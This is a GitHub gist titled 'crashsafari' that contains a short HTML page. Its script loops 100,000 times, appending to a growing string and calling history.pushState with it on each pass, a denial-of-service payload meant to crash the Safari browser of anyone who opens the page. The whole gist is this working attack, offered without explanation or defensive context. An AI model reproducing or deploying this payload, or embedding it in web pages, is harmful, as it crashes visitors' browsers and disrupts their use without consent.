Skip to content

Instantly share code, notes, and snippets.

@jgamblin
Created January 26, 2016 00:07
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save jgamblin/df40e73f7c21f7dd3f36 to your computer and use it in GitHub Desktop.
Save jgamblin/df40e73f7c21f7dd3f36 to your computer and use it in GitHub Desktop.
crashsafari
<!DOCTYPE html>
<html>
<body>
<h1>Crash Safari</h1>
<script>
var total = "";
for( var i = 0; i < 100000; i++ ) {
total = total + i.toString();
history.pushState(0,0, total );
}
</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment